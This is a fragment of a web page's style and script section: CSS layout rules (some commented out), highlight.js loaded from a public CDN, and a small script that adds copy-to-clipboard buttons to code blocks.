#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
